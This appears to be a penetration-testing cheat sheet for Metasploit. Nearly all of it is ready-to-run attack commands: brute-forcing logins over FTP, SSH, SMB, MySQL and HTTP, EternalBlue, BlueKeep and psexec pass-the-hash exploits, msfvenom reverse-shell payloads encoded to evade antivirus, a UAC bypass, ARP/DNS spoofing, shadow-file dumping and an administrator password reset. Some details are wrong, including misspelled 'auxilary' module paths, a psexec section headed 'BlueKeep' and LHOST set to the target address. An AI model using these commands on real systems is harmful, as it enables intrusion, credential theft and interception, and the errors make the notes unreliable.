Auxiliary Modules

Auxiliary modules are used for enumerating hosts, ports, network discovery and so on.

Auxiliary - Apache Enumeration

Search for Auxiliary modules for Apache enumeration:
search apache_userdir_enum

Use the Auxiliary module for Apache enumeration:
use auxiliary/scanner/http/apache_userdir_enum

Set the list of common users from Metasploit framework list:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

Start Apache enumeration:
run

Auxiliary - FTP Anonymous Login

Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the anonymous FTP login module:
use auxiliary/scanner/ftp/anonymous

Show the available options for this module:
show options

Execute the anonymous login attempt:
run

Auxiliary - FTP Login Credentials Brute-Force

Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the FTP brute force module for login attempts:
use auxiliary/scanner/ftp/ftp_login

Set the target IP:
set RHOST target-ip

Set the user wordlist (Metasploit built-in):
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

Set the password wordlist (Metasploit built-in):
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Perform the brute force attack to try to authenticate on the FTP port:
run

Auxiliary - FTP Version Scan

Search for Auxiliary FTP modules:
search type:auxiliary ftp

Use the FTP scanner that also searches for the version:
use auxiliary/scanner/ftp/ftp_version

Check the information of your scan. Ensure that the RPORT is set to 21 (default FTP port):
show options

Execute the FTP port version scan:
run

Auxiliary - HTTP Directory Scan Brute-Force

Search for Auxiliary modules for brute-force directory scan:
search dir_scanner

Use the Auxiliary module for brute-force directory scan:
use auxiliary/scanner/http/dir_scanner

Execute the brute-force for directory scan:
run

Auxiliary - HTTP File Scan Brute-Force

Search for Auxiliary modules for brute-force file scan:
search files_dir

Use the Auxiliary module for brute-force file scan:
use auxiliary/scanner/http/files_dir

Execute the brute-force on file scan:
run

Auxiliary - HTTP Load a file on http server

Load Wmap inside Metasploit framework:
load wmap

List every Wmap command:
wmap_

Add the target-ip to use:
wmap_sites -a target-ip

Add the target URL:
wmap_targets -t http://target-ip

You can check what you have enumerated so far typing the command -l (example: wmap_sites -l):
wmap_sites -l

Run Wmap to get all the auxiliary modules available for your target (it searches automatically):
wmap_run -t

Execute all the auxiliary modules that it has found:
wmap_run -e

Show every vulnerability that it has found:
wmap_vulns -l

Auxiliary - HTTP Login Credentials Brute-Force

Search for Auxiliary modules for brute-force login:
search http_login

Use the Auxiliary module for brute-force login:
use auxiliary/scanner/http/http_login

Set the target-folder that we want to access:
set AUTH_URI target-folder

Set the user brute-force list from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password brute-force list from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Show only the successful results:
set VERBOSE false

Execute the brute-force on login:
run

Auxiliary - HTTP robots.txt

Search for Auxiliary modules about robots.txt:
search robots_txt

Use the Auxiliary module for robots.txt file:
use auxiliary/scanner/http/robots_txt

Execute the robots.txt search:
run

Auxiliary - MySql Enumeration

Search for the MySQL Enum Auxiliary module:
search mysql_enum

Use the Auxiliary module for MySQL enumeration (requires root credentials):
use auxiliary/admin/mysql/mysql_enum

Set the username (root):
set USERNAME root

Set the target password:
set PASSWORD target-password

Start MySQL enumeration:
run

Auxiliary - MySql Execute Sql Commands

Search for the MySQL Auxiliary module:
search auxilary mysql

Use the MySQL Auxiliary module for executing SQL queries on the target:
use auxilary/admin/mysql/mysql_sql

Set the username to root:
set USERNAME root

Set the password for the target user:
set PASSWORD target-password

Set the SQL query to execute (example: show databases;):
set SQL "show databases;"

Run the SQL query:
run

Auxiliary - MySql Login Credentials Brute-Force

Search for Auxiliary modules for MySQL login with brute-force:
search type:auxiliary mysql

Use the Auxiliary module for MySQL login with brute-force:
use auxiliary/scanner/mysql/mysql_login

Specify the root user for the brute-force attack:
set USERNAME root

Set the password list from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Display only successful credentials:
set VERBOSE false

Start the brute-force for credentials:
run

Auxiliary - MySql Schema Dump

Search for Auxiliary modules for MySQL:
search type:auxiliary mysql

Use the Auxiliary module to dump the MySQL schema from the target:
use auxilary/scanner/mysql/mysql_schemadump

Set the username to root:
set USERNAME root

Set the password for the target user:
set PASSWORD target-password

Run the module to execute the schema dump:
run

Auxiliary - MySql Version Scan

Search for Auxiliary modules for MySQL version:
search type:auxiliary mysql

Use the Auxiliary module for MySQL version:
use auxiliary/scanner/mysql/mysql_version

Search for MySQL version:
run

Auxiliary - RDP (RDP)

Search for the Auxiliary module to check if there is an RDP port on the target:
search rdp_scanner

Use the module:
use auxiliary/scanner/rdp/rdp_scanner

Set the target port:
set RPORT 3333

Execute the module:
run

Auxiliary - SMB-Samba Login Credentials Brute-Force

Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to brute-force login on SMB port:
use auxiliary/scanner/smb/smb_login

Set the user to try to login:
set SMBUser target-user

Use the built-in file with common passwords:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Execute the SMB login brute-force attack:
run

Auxiliary - SMB-Samba Shares Enumeration

Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to enumerate shares on SMB:
use auxiliary/scanner/smb/smb_enumshares

Enable a detailed description of what it finds:
set ShowFiles true

Execute the SMB shares enumeration:
run

Auxiliary - SMB-Samba Version Scan

Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the SMB version scanner module:
use auxiliary/scanner/smb/smb_version

Execute the SMB version scan:
run

Auxiliary - SMB-Samba User Enumeration

Search for Auxiliary SMB modules:
search type:auxiliary smb

Use the module to enumerate users on SMB:
use auxiliary/scanner/smb/smb_enumusers

Execute the SMB user enumeration:
run

Auxiliary - SMB-Samba Windows EternalBlue

Use a module that tells if our target os version is vulnerabile to EternalBlue exploit:
use auxiliary/scanner/smb/smb_ms17_010

This module checks if our target os version is vulnerabile to the exploit:
run

Auxiliary - SMTP Version and Enumeration

Search for Auxiliary modules for SMTP:
search type:auxilary smtp

Use the Auxiliary module for SMTP version:
use auxilary/scanner/smtp/smtp_version

Get the SMTP version:
run

Use the Auxiliary module for SMTP enumeration:
use auxilary/scanner/smtp/smtp_enum

Specify a different USER_FILE file if necessary.
Perform users enumeration by brute-force:
run

Auxiliary - SSH Version Scan

Search for Auxiliary modules for SSH version:
search type:auxilary ssh

Use the Auxiliary module to get SSH version:
use auxilary/scanner/ssh/ssh_version

Run the module to get the SSH version:
run

Auxiliary - SSH Login Credentials Brute-Force

Search for Auxiliary modules for SSH:
search type:auxilary ssh

Use the Auxiliary module for SSH login with brute-force:
use auxilary/scanner/ssh/ssh_login

Set the username file to use from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password file to use from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Set verbose mode to false to display only successful credentials:
set VERBOSE false

Start the brute-force for credentials:
run

Auxiliary - SSH User Enumeration

Search for Auxiliary modules for SSH:
search type:auxilary ssh

Use the Auxiliary module for SSH users enumeration:
use auxilary/scanner/ssh/ssh_enumusers

Set the username file to use from the Metasploit framework:
set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt

Set the password file to use from the Metasploit framework:
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Perform users enumeration:
run

Auxiliary - TCP Port Scan

List every auxiliary modules about port scan:
search portscan

Use the Auxiliary module:
use auxiliary/scanner/portscan/tcp

Show options, in order to see if any value is missing:
show options

Execute the Auxiliary module:
run

Auxiliary - UDP Port Scan

Search for Auxiliary modules about UDP Scan:
search udp_sweep

Use the Auxiliary module:
use auxiliary/scanner/discovery/udp_sweep

Execute the Auxiliary module:
run

Auxiliary - Web Server Enumeration

Search for Auxiliary modules about HTTP:
search type:auxiliary http

Use the Auxiliary module for HTTP version scan:
use auxiliary/scanner/http/http_version

If your target uses HTTPS, set the port and enable SSL:
set RPORT 443
set SSL true
Execute the HTTP version scan:
run

Search for Auxiliary modules for HTTP headers:
search http_header

Use the Auxiliary module for HTTP header scan:
use auxiliary/scanner/http/http_header

Execute the HTTP header scan to discover technologies used:
run

Exploit Modules

Exploit modules in Metasploit are used to take advantage of vulnerabilities in systems or applications.
They allow attackers to gain unauthorized access or execute code on the target machine.

Exploit - (Apache) Tomcat Web Server

Search for available Tomcat exploit modules:
search type:exploit tomcat

Use the Tomcat JSP upload bypass exploit:
use exploit/multi/http/tomcat_jsp_upload_bypass

Set the desired Java payload:
set payload java/jsp_shell_bind_tcp

Specify the shell type:
set SHELL cmd

Execute the exploit:
run

Exploit - BlueKeep (Windows)

Search for BlueKeep exploit module:
search BlueKeep

Use the exploit module:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Check what Windows versions you can target:
show targets

Set the number of your target:
set target number

Check/set the CHUNK size (too much high will cause the system to crash)

Run the exploit

exploit

Exploit - BlueKeep (Windows)

Use this after you have got the hash passwords with Meterpreter Pass-the-Hash attack.

Search for PsExec exploit module:
search psexec

Use the module:
use exploit/windows/smb/psexec

Get the port you are on:
sessions

Show options:
show options

Set a different LPORT (different from the one you found in the sessions):
set LPORT number

Set the SMBUser with the target username:
set SMBUser target-username

Set the SMBPass with the LM hash password of the target:
set SMBPass target-LMhash

Set the target shell (to get a Meterpreter shell):
set target Native \upload

Exploit the target:
exploit

Exploit - EternalBlue Windows

Search for eternalblue auxiliary and exploit modules:
search eternalblue

Use the exploit module:
use exploit/windows/smb/ms17_010_eternalblue

Show options:
show options

Run the exploit:
exploit

Exploit - FTP (Linux)

Search for ftp (in this example vsftpd):
search for vsftpd

Use this module:
use exploit/unix/ftp/vsftpd_234_backdoor

Execute the exploit:
run

Exploit - Glassfish (Windows)

Use the Exploit module for Glassfish:
use exploit/multi/http/glassfish_deployer

Set the payload to work for the target os (in this example Windows):
set payload windows/meterpreter/reverse_tcp

And check for any missing field that you require and try to set it:
show options

Run the exploit:
run

Exploit - Haraka (SMTP)

Scan target with nmap to detect service versions and OS:
db_nmap -sV -O target-ip

Search for exploit module related to Haraka:
search type:exploit name:haraka

Use the Haraka exploit module for Linux SMTP:
use exploit/linux/smtp/haraka

Set the server port to use:
set SRVPORT your-port

Set a valid email address:
set email_to your-email

Set the payload to linux/x64 meterpreter reverse HTTP:
set payload linux/x64/meterpreter_reverse_http

Set your local IP address:
set LHOST your-ip

Run the exploit:
run

Exploit - Incognito (Windows)

Search the process ID of explorer to create your own Meterpreter session:
pgrep explorer

Migrate to that process ID:
migrate explorer-port

Get your current user account:
getuid

Get your current privileges:
getprivs

Load the Incognito module:
load incognito

Perform another exploit:
exploit

Load the Incognito module again:
load incognito

List your available tokens:
list_tokens -u

Impersonate the token you want (e.g., Administrator):
impersonate_token "ATTACKDEFENSE\Administrator"

Search the process ID of explorer to create your own Meterpreter session:
pgrep explorer

Migrate to that process ID:
migrate explorer-port

Get your current user account:
getuid

Get your current privileges: now you will have administrator privileges!
getprivs

Exploit - Kernel (Windows)

Use an exploit module:
use exploit/windows/local/ms16_014_wmi_recv_notif

Set the session of the Kernel (check your sessions):
set SESSION session-number

Set the port number (check your sessions):
set LPORT port-number

Start the exploit:
exploit

Exploit - (Linux) Vulnerable Program (Chkrootkit)

In the shell of an exploited target.
Check all the active process, we found something interesting in /bin/bash:
ps aux

Check the content of the file, this file is set to execute chkrootkit (Linux AV):
cat /bin/check-down

Check the version of the AV, in this case it is < 0,5 so it has a known vulnerability:
chkrootkit -V

Put the session in background:
Search for a module for chkrootkit:
search chkrootkit

Use this module:
use exploit/unix/local/chkrootkit

Set the meterpreter session (that is in background):
set SESSION 2

Set the path of chkrootkit:
set CHKROOTKIT /bin/chkrootkit

Set your ip:
set LHOST your-ip

Start the exploit:
exploit

Exploit - Rejetto (Windows)

Search for Rejetto, a framework that is used by UAC:
search rejetto

Use the exploit module:
use exploit/windows/http/rejetto_hfs_exec

Start the exploit:
exploit

Now you can continue with a module called Incognito:

Exploit - Samba (Linux)

Search for exploit modules for samba:
search type:exploit name:samba

Use this module:
use exploit/linux/samba/is_known_pipename

Exploit it:
run

Exploit - ShellShock (Linux)

Search for the Auxiliary module to see if the target is vulnerable:
search shellshock

Use the Exploit module for ShellShock:
use multi/http/apache_mod_cgi_bash_env_exec

Set the target CGI that you have found in the previous method:
set TARGETURI target-cgi.cgi

Run the exploit:
exploit

Exploit - SMB - Samba with Psexec

Search for PsExec exploit modules:
search psexec

Use the exploit module:
use exploit/windows/smb/psexec

Set the target username:
set SMBUser target-username

Set the target password:
set SMBPass target-password

Configure a meterpreter for Windows x64 in this case:
set payload windows/x64/meterpreter/reverse_tcp

Perform the exploit:
exploit

Exploit - SMB - Samba with Socks

Search for SOCKS proxy module:
search socks

Use the auxiliary SOCKS proxy server module:
use auxiliary/server/socks_proxy

Set the SOCKS version:
set VERSION 4a

Set the server port:
set SRVPORT 9050

Start the SOCKS proxy:
exploit

On another terminal: perform a proxychains scan with Nmap:
proxychains nmap target-ip -sT -Pn -sV -p 445

On msfconsole: migrate the process to explorer.exe:
migrate -N explorer.exe

View network shares on the target:
net view target-ip

Exploit - SMB - Samba Relay Attack

Search for the SMB relay exploit module:
search smb_relay

Use the SMB relay exploit module:
use exploit/windows/smb/smb_relay

Set your IP as the server host:
set SRVHOST your-ip

Set your IP as LHOST:
set LHOST your-ip

Set the target IP:
set SMBHOST target-ip

Start the exploit:
exploit

In another shell: create a fake DNS file for spoofing:
echo "your-ip *.target-website.com" > dns

Start DNS spoofing:
dnsspoof -i eth1 -f dns

In another shell: enable IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward

Start ARP spoofing (target → gateway):
arpspoof -i eth1 -t target-ip target-ip.1

In another shell: reverse ARP spoofing (gateway → target):
arpspoof -i eth1 -t target-ip.1 target-ip

With this you can spoof dns connections since they will be redirected to your machine!

Exploit - SSH (Linux)

Search for this module:
search libssh_auth_bypass

Use this module:
use auxiliary/scanner/ssh/libssh_auth_bypas

Spawn a shell:
set SPAWN_PTY true

Start the exploit:
run

Exploit - UAC (Windows)

Set the target IP as a global variable:
setg RHOSTS target-ip

Search Rejetto, a framework that is used by UAC:
search rejetto

Use the module:
use exploit/windows/http/rejetto_hfs_exec

Start the exploit:
exploit

Using UAC (Windows)

Create a payload called backdoor.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=1234 -f exe > backdoor.exe

Start PostgreSQL and Metasploit framework:
Use the module to upload your payload:
use multi/handler

Set the payload we have to upload:
set payload windows/meterpreter/reverse_tcp

Set your IP:
set LHOST your-ip

Set the port you used when creating the payload:
set LPORT 1234

Start to enable the upload:
run

Upload Payload with UACMe

Clone the UACMe repository from GitHub and find the correct .exe file you need (in this example Akagi64.exe):
Move to the C folder in your meterpreter session on the target system:
cd C:\\

Create a Temp folder (where we upload the payload and .exe file):
mkdir Temp

Move to the Temp folder:
cd Temp

Upload the payload we have created before:
upload backdoor.exe

Upload the UACMe file (specifying the correct path):
upload /root/Desktop/tools/UACME/Akagi64.exe

Use the shell:
shell

Execute the UACMe exe in order to use the payload with elevated privileges:
.\Akagi64.exe 23 C:\Temp\backdoor.exe

Exploit - WebDav (Windows) Automatic

Search for the module that will enable uploads on the target WebDav:
search iis upload

Use the module to upload .asp shell:
use exploit/windows/iis/iis_webdav_upload_asp

Set your IP for listening:
set LHOST target-ip

Set the port we have used for our shell:
set LPORT our-port

Set the username (that you got with brute-force for example):
set HttpUsername target-username

Set the password (that you got with brute-force for example):
set HttpPassword target-password

Set the endpoint of the WebDav and the name of your shell:
set PATH /webdav/shell.asp

Start the exploit:
exploit

Exploit - WebDav (Windows) Manual

Use Metasploit framework as a listener for the malicious shell that we have created with msfvenom:
use multi/handler

Set the payload the same as what we have used when we created the shell:
set payload windows/meterpreter/reverse_tcp

Set your IP for listening:
set LHOST your-ip

Set the port we have used for our shell:
set LPORT your-port

Run the listener for the reverse shell:
run

Exploit - WinRM (Windows)

Search for WinRM exploit module:
search winrm_script

Use the Exploit module:
use exploit/windows/winrm/winrm_script_exec

Set target IP:
set RHOSTS target-ip

Force the command to use a VBS script:
set FORCE_VBS true

Set the target username (administrator):
set USERNAME target-username

Set the target password:
set PASSWORD target-password

Start the exploit:
exploit

Exploit - Xoda (WebApp)

Xoda is a web application written in Php for web-based file manager.
Search the Auxiliary module:
search Xoda

Use the Auxiliary module about "Xoda":
use exploit/unix/webapp/xoda_file_upload

Show the options to configure:
show options

Set the url of the target (in this case it is in the root path, so / ):
set TARGETURI /

Run the exploitation on the target:
exploit

Msfvenom

Msfvenom is a standalone payload generator. It is a combination of msfpayload and msfencode. It is fast and uses a single instance.

Msfvenom - Create a shell

Generate an asp shell that you can upload on the target WebDav:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target-ip LPORT=your-port -f asp > shell.asp

Msfvenom - Create a Payload

Create a payload for x32 (x86) that connects to your ip on your port (invent it) with a .exe format (-f):
msfvenom -a x86 -p msf-payload-path LHOST=your-ip LPORT=1234 -f exe > your-path.exe

Msfvenom - Encoding a Payload

Encoding is the process of modifying the payload signature to avoid AntiVirus detection.
Create a msfvenom payload with the specified encoder with 10 iterations (-i) to increase chance of avoid AV detection:
msfvenom -p msf-payload-path LHOST=your-ip LPORT=1234 -i 10 -e msf-encoder-path -f exe > your-path.exe

Msfvenom - List Payloads and Encoders

Show every available Payload:
msfvenom --list-payloads

Show every available Encoder:
msfvenom --encoders

Post-Exploit Modules

These modules are used after you have exploited a service or host.

They are helpful modules to elevate privileges or perform common post-exploit techniques

Post - Dumping Linux Hashes Passwords

Show the content of file shadow:
cat /etc/shadow

Copy the hashed password (check the $ number) and put the session in background.
Search for the module:
search hashdump

Use this module:
use post/linux/gather/hashdump

Set the meterpreter session:
set SESSION 2

Run the module:
run

Post - Enabling RDP

Search for the module to enable RDP:
search enable_rdp

Use the post-exploitation module to enable RDP:
use post/windows/manage/enable_rdp

Select the active session:
set SESSION 1

Run the module to enable RDP:
exploit

Scan to confirm RDP (port 3389) is active:
db_nmap -sV -p 3389 target-ip

Reconnect to the session:
session 1

Open a shell on the target:
shell

View active users on the system:
net users

Change the Administrator password:
net user administrator new-password

Access RDP using the new credentials:
xfreerdp /u:administrator /p:new-password /v:target-ip

Post - Linux Post Exploitation Modules

Search for module to gather Linux system configuration:
search enum_config

Search for modules to enumerate environment variables:
search env platform:linux

Search for module to enumerate network protocols:
search enum_network

Search for module to detect system protections:
search enum_protections

Search for module to enumerate system info (like installed packages):
search enum_system

Check if the target is a Docker container:
search checkcontainer

Check if the target is a Virtual Machine:
search checkvm

Search for module to enumerate user history:
search enum_users_history

Post - Privilege Escalation (Windows)

Use the module:
use post/multi/recon/local_exploit_suggester

Execute the module:
run

After this you can try to perform Kernel exploitation, for example.